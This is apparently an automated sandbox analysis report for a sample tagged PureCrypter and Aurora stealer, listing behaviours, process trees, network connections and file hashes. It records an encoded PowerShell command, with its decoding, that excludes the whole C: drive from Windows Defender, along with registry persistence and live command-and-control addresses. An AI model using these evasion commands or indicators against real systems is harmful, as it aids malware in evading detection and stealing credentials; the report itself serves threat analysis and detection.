Analysis Overview
SHA256
471d501162e2a5cb6aab3f4f5362ff843d05ef9f20d9fd7ea29733d3a9875747
Threat Level: Known bad
The file 5e243f79ecb539d0d1f75fce7ddfedeccee70a48 was found to be: Known bad.
Malicious Activity Summary
PureCrypter
Aurora
Detect PureCrypter injector
Loads dropped DLL
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-05 13:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-05 13:22
Reported
2023-02-05 13:25
Platform
win7-20220901-en
Max time kernel
68s
Max time network
73s
Command Line
Signatures
Aurora
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 276 set thread context of 1676 | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
(The -ENC argument is base64 of UTF-16LE text; it decodes to: start-sleep -seconds 35)
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
(Both -ENC arguments above are the same base64 of UTF-16LE text; they decode to: set-mppreference -exclusionpath C:\ which adds the whole system drive to the Windows Defender exclusion list)
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
Network
| Country | Destination | Domain | Proto |
| DE | 45.9.74.11:8081 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 199eb6947e63125e72f3861b06f6c58b |
| SHA1 | 729effef0ce56ca0e5bed1dc546cd7ec473aa8f0 |
| SHA256 | de8b9281b731b824ca072b0d3594b4d399b207563d9a3a556336439507029095 |
| SHA512 | 8d9269b3e3681ef0de77721904212bd701135a9900aa2307ef3caeee41afb62e7f5d38e9f7d24d272bec9ef6164e1b3ffcc817582888677d1b642db5a8a0af6a |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 7bfe67bdd2e19278aac743d48a9d490f |
| SHA1 | b599003016541fcb14fff8806f96d1a1d1e8f5ff |
| SHA256 | f70d9790310123c63f315ff17d8abea763198763b44efe9564226de673f91d96 |
| SHA512 | 1047207a1b76af6f549894791a437158ead2047565ad32496019f176507349d509b20905664fab0cf30fcc27415260a8f8d829323959fb29458dbb35de0636a2 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | ad3b7071fe2095f7e4ca0dc0c0b8faa1 |
| SHA1 | 306dd50a0fbd1652afa3d3bf3d71b26c1859026a |
| SHA256 | 83fe92bdcf03942e14f99e342c5b9afd1fd93a15799d8ed5677a3d3b2d50fc4a |
| SHA512 | d4ee312c71ed5d3a33a55666d7e6ffbcbf3a4c372097b7eb89ae89cbd3e0b0198e20ae1349c2345a6542f7ca2835697fe6d2473f2a6ed6001971cd5d8b2c7ac8 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e7537ddd62b75d68319ca1dfe6b9bf11 |
| SHA1 | 2cb4a21af1c267fe6d4dba9f69fc98607e87f83b |
| SHA256 | 507f603503438e5272cddaf5086586246ab5040dae7e51c47fabcae5a67aec82 |
| SHA512 | 07d70f19aabb03751d0699309a166d38491d1d4fd57c02ea66f30866ef3139365f11b65b1d93370ed8ebfd2dc8bf78e659cf84575b5a9a52ad35c94e25850c74 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | c033cb6da9044f4154da3bcb3387103a |
| SHA1 | a417a88f53e352ece8ef7c0d40b348d7cd784171 |
| SHA256 | ef190b960f0ce33ff0ca055efbf400f603c82bb85c5174f1e9cab9fa7d9d6336 |
| SHA512 | d8037700d5db9759f46aaa18f0c78ba71ac8d49df36d86adb2ed3026ba0d3dbd45e9659e112b78bc664dde760ab8b07fd89fe6fd66f48bdb4ca2cdcb85d5be04 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 4f3b117e33b565f92f03c7e2199c9e1c |
| SHA1 | a2fe077be04913630f2e11624144175540ba1b9d |
| SHA256 | cf8693be97868d6841436f4ee50e81d2d3a66203a81416c9b9a069bb39054340 |
| SHA512 | 00c2e1038225acf180e65728e851fe04b5cb3cf55c5c76b833a9b97ebb9c4fda3c8e8c385fa861e81b967b630d383b0bdd958edf177b256d15f0f0fdb7738553 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 2d7c3b2f03f46e83d6cb32421e7e2be0 |
| SHA1 | 0e30533413bf4f235bb32f931c8560818483e17d |
| SHA256 | 95ded91f3a43d79f3d151fd8df5d5e36d9b1847ce27714fdb24abdc743c1b106 |
| SHA512 | c65ecfcc962122ee94a6afc4fdafb374ccb49ee571d3670694edbf045ff8f8b495a56aa3a609efbb9c75c7527f0687a9e9cb2e67d8841d7ab51949ee7eb0863b |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | f5879abfadd060d8caabc3a158f70540 |
| SHA1 | e326e70e265db1b1eef1b9fc1fa8ff577877eebc |
| SHA256 | 914dfa77e9ee58454cab5adc48142fbd4b384f44399b10bbd687b392e0f399b4 |
| SHA512 | 215ac52521976cae98fbb50d23520ab2fe21c5f5bbc381e97cde3d6d9b26bed6cb1864640944a91fa0143a25f4d2518a82ab848e153cc04f2906525be13bc7c8 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | c9e95b82778a406da539770b9844b5b8 |
| SHA1 | 8ce26d06d6b7b5d1eab5697182b873a69d671a00 |
| SHA256 | 38154ae24c1712776c359ba64407ef747305a4aaa6d8f5730af96831c2a7fd54 |
| SHA512 | e631629b44545acbe3e336c5095b149e249ab5a7e34e5b762146727cb89d9849170eac7687d3053aff676c597d89ee3abf15ccde3f98f02387a9558fde3a3464 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e6316303219e281343685f1643f8a653 |
| SHA1 | fb7c692afe8928264732e238a538f832018f198c |
| SHA256 | 0f28fb602e7fee95e69322c48cab96c473aea00a879a9e55214af77d4aa5bdf0 |
| SHA512 | afd18b9ede2555281e371c89d12390f1c8a730cbc29932e75e18c9c171b6a5731eb9c0d1db83c3d6c86cd42c2da9a666e81cd47c9f8419a069ca55c0762438fc |
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-05 13:22
Reported
2023-02-05 13:25
Platform
win10v2004-20221111-en
Max time kernel
138s
Max time network
147s
Command Line
Signatures
Aurora
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
(The -ENC argument is base64 of UTF-16LE text; it decodes to: start-sleep -seconds 35)
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
(Both -ENC arguments above are the same base64 of UTF-16LE text; they decode to: set-mppreference -exclusionpath C:\ which adds the whole system drive to the Windows Defender exclusion list)
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
Network
| Country | Destination | Domain | Proto |
| US | 72.21.91.29:80 | | tcp |
| NL | 84.53.175.11:80 | | tcp |
| US | 20.189.173.3:443 | | tcp |
| NL | 104.80.225.205:443 | | tcp |
| RU | 62.204.41.170:27941 | | tcp |
| NL | 96.16.53.137:80 | | tcp |
| NL | 96.16.53.137:80 | | tcp |
| NL | 96.16.53.137:80 | | tcp |
| DE | 45.9.74.11:8081 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | ba50f2bca86ba947a8d2035bb9b35123 |
| SHA1 | a542b5c5d41174dc2475a219978123b7d14f958f |
| SHA256 | 17790c5c071280462ed8e617fd2edfff5bf0f40fb9add57f866f058fdbf24cb5 |
| SHA512 | 08fdb619e411247c571710bc47df2463c95dc2fee82025e548b65ff1a3e4a53e663fafec9bcc5cc234f32211b25f6f9472786c1be543eb71629f32ec09f04379 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 14a9737eb666769fee7c28a00eb14e82 |
| SHA1 | ab8f2279f13a546fc32233a4da0855660fb07ec0 |
| SHA256 | a5fda7973fc4b9cf7fa14943302c0b6cd81c7615105ab0031e20fc5ed2a2396a |
| SHA512 | 973d5236da1979d31376d55f6b304fa166835d99a4574e3345e25ebed5b492cf9a3ae3f0a800d137fa8756288684b6d5c07ff97c8e5c2cbb698585f09373e9e7 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 6195a91754effb4df74dbc72cdf4f7a6 |
| SHA1 | aba262f5726c6d77659fe0d3195e36a85046b427 |
| SHA256 | 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5 |
| SHA512 | ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d1905bc82ea393a435265cde34ec5f4c |
| SHA1 | dda21740632614a1e62a38f43748793bc52f63de |
| SHA256 | 379cc41273bfdcc69afb1bd957aec78462bef52eff97841b4f6b23e915295a5c |
| SHA512 | d8607ddc4dc0665eefff5a1a1354b3efb0af183da4a97fd3c20e41a00f56869c3de3cc0b98f27b303706096c816f332cc3b9c3a703b261fa7a9d7dea4ae68397 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | d16f03cba377d1da242948003935905d |
| SHA1 | d53fee552e6145ae324afa81f211054124502568 |
| SHA256 | 69293bc85dda101d21edff1deee7fcba1d0378aaa9ae6cce5aa920c119dadba9 |
| SHA512 | 48b057953f656cdc297ad59a09e35d48904ec7ca47ba529da927b6716d3b73c51cc4322f45b808af6a056d484871f1316c1b20dbccc3b58b010ae7b5a9074928 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 56b84c460605b9afe06b71e48ee29ef7 |
| SHA1 | fa3dd9195f820e8e54f7d947e44580742aedf02c |
| SHA256 | 887147ede6ab7d01f1cab8f99c09be460ea45e4f85b3b973c4113bad720f5b45 |
| SHA512 | c240d464b0d1632abd6352895f2de0ac1343516bfb74675a5a06c122dcfa5e5547e9ae81fd467bb15323b0d37a88c60d50846f4fe8ae877dc3f849ad5645a509 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | c1b0f039e0ebdd40b81764b2ea039f1d |
| SHA1 | 6cf9e83e933e0fad43e16d935bff5765d672c072 |
| SHA256 | 5d3d32583b34f40bc7ba495867d879be20529af326f360dbbdc268ac28fd6a08 |
| SHA512 | 6b96d6964e5fede065af30b21b1c0d59c3de72f45f6933806e8517b9f188e477c8fb10e8bb367403949a640551125319d9e73df3916b1b569b098520d8522bbe |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 39e33320af8468e7e556924f02d47d67 |
| SHA1 | a9a077b6503e76391d0722ee2d998ec0e4812b0d |
| SHA256 | a245e5597392c4404c0d90f951bf14822693de94c439779702a42bb36a37663e |
| SHA512 | f647e412ad0e3afbec1c8ba07297e6b691314ee9dc45dbf5cdc828fdaa0bb1d951e57593a7f971d58f8d897cfe0fb9bcc4b283533ed8e9832fddbf2dc2b2ca2b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |